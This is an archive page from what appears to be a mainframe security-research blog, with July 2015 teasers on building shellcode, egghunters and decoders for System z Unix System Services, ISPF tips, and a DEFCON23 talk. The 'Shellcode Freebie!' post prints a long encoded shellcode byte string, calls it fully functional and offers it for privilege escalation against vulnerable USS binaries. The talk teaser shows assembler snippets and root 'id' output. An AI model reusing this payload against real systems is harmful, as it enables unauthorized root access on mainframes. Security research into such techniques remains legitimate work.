Creating shellcode on System Z (Mainframe) Unix System Services (USS) employs the same disciplines required for the same activities on Intel platforms. The difference lies in the syntax, assembler mnemonics, tools available, and debugging utilities. There are certainly other ways to achieve this, and I’m still refining my favorites. The below is one of my… Continue reading Building shellcode, egghunters and decoders.
Month: July 2015
Mainframe security research – perfectly summed up in this short video
Shellcode Freebie!
Got a burning privesc vulnerable binary on your USS? How about feeding it a little self-decoding shellcode? (Hint this is fully functional, find a C stub and try it yourself!). “\x90\xec\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22” “\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12” “\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef” “\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4” “\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x17\x22\x17\x33\x1a\xb1” “\x1b\xb4\x50\xd0\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34” “\x1a\x34\x1a\x34\x1a\x34\x18\x53\x1b\x31\x18\x41\x17\x11\x17\x22” “\x97\x02\x30\x01\x1a\x14\xb9\xf8\x10\x23\x97\x02\x20\x01\xa7\x1e” “\x01\x70\xa7\x44\xff\xf9\x17\x44\x58\xd4\xb0\x04\x0d\xe5\xde\xad” “\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\x92\xe9” “\xd2\x0e\xc2\xf2\xfd\xfd\xfd\xfc\x5a\x02\xf2\x2a\x5a\xf2\xf2\x2e” “\x5a\xe2\x02\x12\x5a\xec\x01\x06\x5a\xec\x02\xa2\xb0\x1a\xe2\x02” “\xa5\xf6\x02\x05\x02\x02\x02\x12\x02\xda\x02\x02\x02\x04\x1a\xff” “\x1a\xd3\x52\xf2\xd2\x06\x52\xd2\xf2\x0a\x5a\x12\xf2\x1a\x43\xa2” “\x02\xda\x1c\xaf\x52\xa2\xd2\x4a\xc2\x32\x02\x02\x02\x75\xe9\xe9” “\xd2\x96\x02\x24\xc2\xb2\x02\x02\x02\x77\x43\x22\x02\x02\x52\x22” “\xd2\x82\x43\xe2\x02\x05\x52\xe2\xd2\x86\x43\xe2\xd2\x82\x52\xe2” “\xd2\x8a\x1a\xe0\x52\xe2\xd2\x92\xd0\x01\xd2\x92\xe2\x12\x5a\xe2” “\xd2\x92\xd0\x01\xd2\x92\xe0\x22\x5a\xe2\xd2\x92\xd0\x01\xd2\x92” “\xe2\x1a\x5a\xe2\xd2\x92\xd0\x01\xd2\x92\xe2\xe6\x5a\xe2\xd2\x8a” “\x1d\x02\x41\x02\xe2\x02\x5a\xf2\xd2\x92\x43\xe2\xd2\x82\x43\x42” “\xd2\x86\x43\x12\xd2\x4e\x52\x42\xd2\x4e\x1a\x49\x52\x42\xd2\x52” “\x52\xe2\xd2\x56\x52\x02\xd2\x5a\x52\x02\xd2\x5e\x52\xe2\xd2\x62” “\x52\x02\xd2\x66\x52\x02\xd2\x6a\x52\xe2\xd2\x6e\x52\x02\xd2\x72” “\x52\xe2\xd2\x76\x52\xe2\xd2\x7a\x52\xe2\xd2\x7e\xd0\x01\xd2\x0a”… Continue reading Shellcode Freebie!
Tips / Tricks – 7/2/15 (update)
Updated. Added update to the packet capture section below, included pcap export! ISPF editor Want more real estate in your ISPF editor? In an editing session enter EDSET in the command line, then check the line marked: X Remove action bars in ISPF edit and view panels This will remove the menu bars and… Continue reading Tips / Tricks – 7/2/15 (update)
Mainframe shellcode
Come see my talk at DEFCON23. … SLR 14,14 MVC 32(4,13),16(14) L 14,32(,13) … \x1f\xee \xd2\x03\xd0\x20\xe0\x10 \x58\xe0\xd0\x20 … # id uid=0(IBMUSER) gid=0(SYS1) … Stay tuned to this site and follow @bigendiansmalls for sneak peeks at what I will be presenting!